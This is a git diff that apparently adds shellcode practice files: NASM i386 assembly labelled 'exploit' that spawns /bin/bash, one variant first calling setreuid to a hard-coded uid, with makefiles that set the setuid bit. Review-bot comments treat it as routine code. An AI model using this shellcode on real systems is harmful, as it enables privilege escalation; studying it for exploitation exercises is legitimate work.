-rw-r--r-- | exec_cmd/makefile | 5 | ||||
-rwxr-xr-x | exec_cmd/shell | bin | 0 -> 4268 bytes | |||
-rw-r--r-- | exec_cmd/shell.asm | 19 | ||||
-rw-r--r-- | exec_cmd/shell.o | bin | 0 -> 528 bytes | |||
-rw-r--r-- | exec_cmd_setuid/makefile | 5 | ||||
-rwxr-xr-x | exec_cmd_setuid/shell | bin | 0 -> 4288 bytes | |||
-rw-r--r-- | exec_cmd_setuid/shell.asm | 28 | ||||
-rw-r--r-- | exec_cmd_setuid/shell.o | bin | 0 -> 592 bytes |
8 files changed, 57 insertions, 0 deletions
diff --git a/exec_cmd/makefile b/exec_cmd/makefile
new file mode 100644
index 0000000..676ee34
--- /dev/null
+++ b/exec_cmd/makefile
@@ -0,0 +1,5 @@
+make:
+ nasm shell.asm -felf32 -o shell.o
+ ld -m elf_i386 shell.o -o shell -s
+ chmod u+s shell
+
diff --git a/exec_cmd/shell b/exec_cmd/shell
Binary files differ
new file mode 100755
index 0000000..9ea0d3b
--- /dev/null
+++ b/exec_cmd/shell
diff --git a/exec_cmd/shell.asm b/exec_cmd/shell.asm
new file mode 100644
index 0000000..d90d9a4
--- /dev/null
+++ b/exec_cmd/shell.asm
@@ -0,0 +1,19 @@
+global _start
+_start:
+jmp short data
+
+exploit:
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+pop edx
+mov [edx + 10], eax
+mov al, 11
+mov ebx, edx
+xor edx, edx
+int 0x80
+
+
+data:
+call exploit
+cmd: db '/bin/bash'
diff --git a/exec_cmd/shell.o b/exec_cmd/shell.o
Binary files differ
new file mode 100644
index 0000000..50283e1
--- /dev/null
+++ b/exec_cmd/shell.o
diff --git a/exec_cmd_setuid/makefile b/exec_cmd_setuid/makefile
new file mode 100644
index 0000000..676ee34
--- /dev/null
+++ b/exec_cmd_setuid/makefile
@@ -0,0 +1,5 @@
+make:
+ nasm shell.asm -felf32 -o shell.o
+ ld -m elf_i386 shell.o -o shell -s
+ chmod u+s shell
+
diff --git a/exec_cmd_setuid/shell b/exec_cmd_setuid/shell
Binary files differ
new file mode 100755
index 0000000..9a98c4f
--- /dev/null
+++ b/exec_cmd_setuid/shell
diff --git a/exec_cmd_setuid/shell.asm b/exec_cmd_setuid/shell.asm
new file mode 100644
index 0000000..504685f
--- /dev/null
+++ b/exec_cmd_setuid/shell.asm
@@ -0,0 +1,28 @@
+global _start
+_start:
+jmp short data
+
+exploit:
+
+xor edx, edx
+
+xor eax, eax ; set reuid
+xor ebx, ebx
+xor ecx, ecx
+mov al, 203
+mov bx, 14005
+mov cx, 14005
+int 0x80
+
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+pop edx
+mov [edx + 10], eax
+mov al, 11
+mov ebx, cmd
+int 0x80
+
+data:
+call exploit ; this puts the address of where we're at (where the string is!) in the stack and jmps to start
+cmd: db '/bin/bash'
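Review bot: The last recipe step `chmod u+s shell` marks the output setuid as part of the default build rule, and the build products `shell` and `shell.o` are committed in this same change as binary files; the setuid bit only has an effect when the file is root-owned, so that step belongs in a separate, explicit target rather than the rule that runs on every build, and the generated binaries should be excluded from version control. The rule is named `make:` rather than the conventional `all:` and there is no `.PHONY` line, so a file called `make` in the directory would silently satisfy the target. The lines `all:` and `.PHONY: all` would fix both. exec_cmd_setuid/makefile is byte-identical and has the same points.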
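Review bot: The file has no header stating its target or ABI, and the syscall number is a bare literal: `mov al, 11` is only readable to someone who already knows the Linux i386 int 0x80 table. A header such as `; Target: Linux i386, int 0x80 syscall ABI; build: nasm -felf32` plus `SYS_EXECVE equ 11` used as `mov al, SYS_EXECVE` would make the intent explicit. The `exploit:` label also deserves a one-line comment giving the register roles at the `int 0x80` (eax = syscall number, ebx = path pointer popped from the stack, ecx and edx = NULL), since nothing in the file says what the `pop edx` / `mov ebx, edx` pair is for. exec_cmd_setuid/shell.asm is missing the same header.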
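Review bot: The comment on `call exploit` says the call "jmps to start", but the destination is the `exploit` label, and the `; set reuid` comment is attached to `xor eax, eax` rather than to the `int 0x80` that performs the call; both should be corrected so the comments match the code they sit on. The literals `203` and the twice-repeated `14005` are unnamed magic numbers; `SYS_SETREUID32 equ 203` and `TARGET_UID equ 14005` would let the first syscall block read as `mov al, SYS_SETREUID32` / `mov bx, TARGET_UID` / `mov cx, TARGET_UID`, and a change of uid would then be a one-line edit. The second syscall block hard-codes `11` in the same way as exec_cmd/shell.asm and should use the same named constant.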
diff --git a/exec_cmd_setuid/shell.o b/exec_cmd_setuid/shell.o Binary files differnew file mode 100644 index 0000000..59be327 --- /dev/null +++ b/exec_cmd_setuid/shell.o |